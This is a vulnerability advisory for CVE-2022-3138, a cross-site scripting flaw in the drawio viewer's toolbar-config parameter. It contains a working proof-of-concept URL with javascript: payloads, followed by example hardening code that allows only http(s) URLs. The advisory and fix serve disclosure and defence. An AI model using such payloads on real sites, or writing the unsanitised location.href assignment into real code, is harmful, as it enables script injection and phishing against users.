Security Headlines
CVE-2022-3138: XSS at https://viewer.diagrams.net/ in drawio

Cross-site Scripting (XSS) - Generic in GitHub repository jgraph/drawio prior to 20.3.0.

CVE
#xss #js #git #java

Description

The application takes a URL for the refresh and back toolbar buttons from a request parameter (the `toolbar-config` JSON) and assigns it to location.href without sanitizing it.

Proof of Concept

Go to:

https://viewer.diagrams.net/index.html?tags=%7B%7D&highlight=0000ff&&layers=1&nav=1&toolbar=1&toolbar-config=%7B%22backBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D,%22refreshBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D%7D&title=xss.drawio#RdZNdb9sgFIZ%2FjaXtopUDTdZdxkmbatI2TVnVa2qoTQscD%2BPa6a%2FfIYA%2F1lWyZHjOy%2FnikNGdHg6WNfV34EJlJOdDRvcZIasrQjL%2F5fwUCF1HUFnJo2gCR%2FkmIswj7SQX7ULoAJSTzRKWYIwo3YIxa6Ffyp5ALaM2rBLvwLFk6j19kNzVgV6TLxO%2FE7KqU%2BTV5muwaJbEsZK2Zhz6GaI3Gd1ZABdWetgJ5ZuX%2BhLO3X5gHROzwrj%2FHLhvhf35%2BOx7QnLFHvFezqKMbBTqiycw3tK6Uyx186eDZLhozxexRcE6b%2FAyi8mOq8r%2Ff4vBJWcYNfgLppCakuYlxHxmr6wtrWzQuF1sfLr%2BW%2BcMW27dJw5lp7GiSw6aSfM5uEpFr39ct923fP9r%2F3ab3w2H432nL1ZjM8cmTVUR59OkRe20b8AKl62z8CJ2oMAiMWCEr1oq9Q9iSlYGtyWmI5AXr5igxNHYRoOWnPswRV9LJ44NK33MHh8CMgud4cLnnY8d8Q7E8OH9zQs5CNDC2RNK4gFK4yDFl0Q2cd9Pc5lQPRvJdIzFl1CNnqdhwUXsXdrOxiehaVTP8tmDpzd%2FAQ%3D%3D

Click the refresh or back icon on the toolbar.

Impact

XSS, phishing
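As an added example (not drawio's own code), the pattern behind this finding next to a hardened replacement: the `toolbar-config` query parameter and its `backBtn.url` / `refreshBtn.url` fields are the page's real names, while `safeNavigationUrl` and `parseToolbarConfig` are hypothetical helpers that resolve each button URL against the page origin and keep only http(s) targets, so the `javascript:` values from the PoC above are dropped instead of reaching location.href.

```javascript
// Added example, not drawio's code. The advisory's bug is that a URL taken
// from the toolbar-config parameter is assigned to location.href unchecked,
// so a javascript: URL runs in the page origin. The hardened version parses
// the value with the URL constructor and only navigates to http(s) targets.

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Return a navigable absolute URL string, or null when the value must be ignored.
// `base` is the current page URL (location.href in a browser); relative paths
// resolve against it, so same-site links keep working.
function safeNavigationUrl(raw, base) {
  if (typeof raw !== 'string' || raw.trim() === '') return null;
  let parsed;
  try {
    parsed = new URL(raw, base);
  } catch (e) {
    return null; // unparsable input is never navigated to
  }
  // The URL parser lowercases the scheme, so "JavaScript:" and "javascript:"
  // both end up as "javascript:" and are rejected here, as are data: and blob:.
  return ALLOWED_PROTOCOLS.has(parsed.protocol) ? parsed.href : null;
}

// Parse the JSON carried by the toolbar-config query parameter and return the
// validated button targets. Missing, malformed or unsafe values become null.
function parseToolbarConfig(queryString, base) {
  const params = new URLSearchParams(queryString);
  const rawConfig = params.get('toolbar-config');
  const out = { backBtn: null, refreshBtn: null };
  if (rawConfig === null) return out;
  let cfg;
  try {
    cfg = JSON.parse(rawConfig);
  } catch (e) {
    return out; // invalid JSON: leave both buttons without a target
  }
  for (const key of Object.keys(out)) {
    if (cfg && typeof cfg[key] === 'object' && cfg[key] !== null) {
      out[key] = safeNavigationUrl(cfg[key].url, base);
    }
  }
  return out;
}

// Vulnerable pattern (what the advisory describes) vs. the hardened one:
//   location.href = cfg.backBtn.url;                              // runs javascript: URLs
//   const target = safeNavigationUrl(cfg.backBtn.url, location.href);
//   if (target !== null) location.href = target;                 // http(s) only
```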
